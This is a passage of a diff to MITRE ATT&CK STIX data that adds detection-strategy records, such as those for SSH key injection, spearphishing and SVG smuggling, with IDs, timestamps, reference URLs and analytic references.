+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.669000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--cf33849d-67f4-418e-9a41-6a6c082e576a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.693000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0126",
+                            "external_id": "DET0126"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for SSH Key Injection in Authorized Keys",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--72dd4fd9-b6cb-4704-b845-0632fe224995",
+                        "x-mitre-analytic--29988e3f-2f65-4fe5-9bf7-dae0cb869fc6",
+                        "x-mitre-analytic--d613771b-087c-43c4-8430-2a0bf6ebb314",
+                        "x-mitre-analytic--e5b0d0ab-a464-4e9f-a1c0-dfb08a6ef53f",
+                        "x-mitre-analytic--4d8e89c0-fbde-43fc-adc4-d2f50bec3193"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.693000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--bdbd724e-b3e2-44d7-a9d6-ba2a4915762c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.691000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0256",
+                            "external_id": "DET0256"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for SSH Session Hijacking",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3517708a-f80e-4335-a122-65b9b3505e8d",
+                        "x-mitre-analytic--de71bbc0-66b2-41ae-a3f3-4911ac31b391"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.691000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--6c59d987-c339-4743-bdb0-0eb21285deb7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.680000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0510",
+                            "external_id": "DET0510"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for SVG Smuggling with Script Execution and Delivery Behavior",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--288a28ac-e1e4-4e7e-9156-d3b975ed45ed",
+                        "x-mitre-analytic--99bfd95b-256a-4b1d-bf1d-481f47642c15",
+                        "x-mitre-analytic--fe1cff12-9772-4ba9-92bc-c26eae79da24"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.680000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--8c92a33f-ac2f-4ae9-9258-7a6a67922ad4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.684000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0116",
+                            "external_id": "DET0116"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Safe Mode Boot Abuse",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d7a82fc6-047b-47a8-8b3c-d6dcab00d56b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.684000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3ec6ad13-f3d6-4eb2-91fe-6ee5266d1447",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.675000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0399",
+                            "external_id": "DET0399"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Scheduled Transfer and Recurrent Exfiltration Patterns",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--79600919-afe8-4ac9-946c-147d85af6cfe",
+                        "x-mitre-analytic--11ac52fe-f8e0-4748-9fbc-2f85c43ad506",
+                        "x-mitre-analytic--837bd639-c291-4e42-b737-6a21d6bf8fd5"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.675000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7a848f8f-4bdc-426c-989e-bc1abfaeb7fa",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.682000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0374",
+                            "external_id": "DET0374"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Serverless Execution (T1648)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ecf190d1-5311-466f-a361-a33820b3c7b7",
+                        "x-mitre-analytic--f8787a86-552b-4e03-8d68-7177001a215d",
+                        "x-mitre-analytic--8708dc0b-8eeb-4a3d-8770-2fab30f46682"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.682000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--8d904004-e492-4f76-9f84-be75fc61e5c5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.684000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0236",
+                            "external_id": "DET0236"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Spearphishing Attachment across OS Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--db6995d9-68ab-4638-a430-c0a8d2daf306",
+                        "x-mitre-analytic--02309791-384c-4ca9-b25c-6a6bc754795f",
+                        "x-mitre-analytic--7a6192b4-997a-4526-bb3d-76664bc31274"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.684000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ed58a144-2554-495c-9c60-18e6f817aa75",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0107",
+                            "external_id": "DET0107"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Spearphishing Links",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a39fccda-e5ea-49de-80f9-d67ae3b8c799",
+                        "x-mitre-analytic--e08e4dd6-cab5-41c0-b136-1bc8426c25ed",
+                        "x-mitre-analytic--b18b93d1-3f63-4788-8e26-68db032995e0",
+                        "x-mitre-analytic--cfc7b6bc-2ca3-4407-a835-b40bf6a98efc"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ec33e12c-e0f1-426d-a453-fa5ae4d3cf9a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0245",
+                            "external_id": "DET0245"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Spearphishing Voice across OS platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--caa11058-4906-48b4-ab3f-a650aab6968d",
+                        "x-mitre-analytic--c5134555-561a-4905-8601-a6ba307fc121",
+                        "x-mitre-analytic--756214e0-660d-4f32-a4f1-f8ff24a7852f",
+                        "x-mitre-analytic--345af006-d658-4f22-aef6-b1cfc0058875"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--dd232215-bb7f-461f-ac3f-e7cf5612e396",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0115",
+                            "external_id": "DET0115"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Spearphishing via a Service across OS Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c83f1d8c-ba54-4f2d-91b8-3006a2180497",
+                        "x-mitre-analytic--eed7a6f2-496d-47c6-bdfd-1b885b58a651",
+                        "x-mitre-analytic--262ce2a7-2c09-4f6d-8e9f-de57b814a2a2"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7b0ea292-22f5-4963-b1c2-0d396fb17619",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.682000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0240",
+                            "external_id": "DET0240"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Steal or Forge Authentication Certificates",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c448cbb5-1256-4a00-8582-1759fb5a6e56",
+                        "x-mitre-analytic--27cbe2a7-25a0-4f6d-b2b0-dff50b2c0883",
+                        "x-mitre-analytic--62285936-d8a3-4b18-b3b4-a521fbef10ec",
+                        "x-mitre-analytic--af8d3a12-dafb-4e40-8017-7d20d9e77d55"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.682000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a57c9ffb-8b18-4178-a07f-e596abe389bd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.687000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0119",
+                            "external_id": "DET0119"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Steganographic Abuse in File & Script Execution",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a7666a4d-ece8-4e5b-ae85-d2987f14b950",
+                        "x-mitre-analytic--f884a712-ace6-426c-ab81-8ff33e83be92",
+                        "x-mitre-analytic--eb5334b4-8a19-4efd-a225-44a2783c6d39"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.687000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e3776b4e-00b0-44cd-9e77-5df960a979d7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0193",
+                            "external_id": "DET0193"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Stored Data Manipulation across OS Platforms.",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e08eb9fa-4a45-434b-9776-277bd545f1f7",
+                        "x-mitre-analytic--425a3e89-ac22-4ff3-bc1e-ca1672113075",
+                        "x-mitre-analytic--23b6aee9-90fc-46b8-bf8b-36043218f393"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e4040d30-1f5a-4f80-9f06-f1c1d2a8c238",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0019",
+                            "external_id": "DET0019"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Stripped Payloads Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e7b2c8da-d54d-446a-a7f6-062fe234a8cc",
+                        "x-mitre-analytic--52d150da-36f4-43b4-96c4-b4fe33b012a2",
+                        "x-mitre-analytic--1b5b9ee8-69e6-41d4-a529-aa18afcdf453",
+                        "x-mitre-analytic--a53e2979-2c41-44bc-b46e-13a19305e00d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--541f2335-1046-4621-9829-1a4a305069c5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0442",
+                            "external_id": "DET0442"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Subvert Trust Controls using SIP and Trust Provider Hijacking.",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--5b6f6588-3434-4199-b16f-af44ae546c3d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d9e95391-5ea4-49af-a525-31655a72e470",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0056",
+                            "external_id": "DET0056"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Subvert Trust Controls via Install Root Certificate.",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a65545d7-fa1b-4d6f-b19c-fa03862c6210",
+                        "x-mitre-analytic--759c073c-2c40-484b-af47-8426ec5d5a3e",
+                        "x-mitre-analytic--477fb167-a388-4e85-856b-bdcb36e7fd95"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
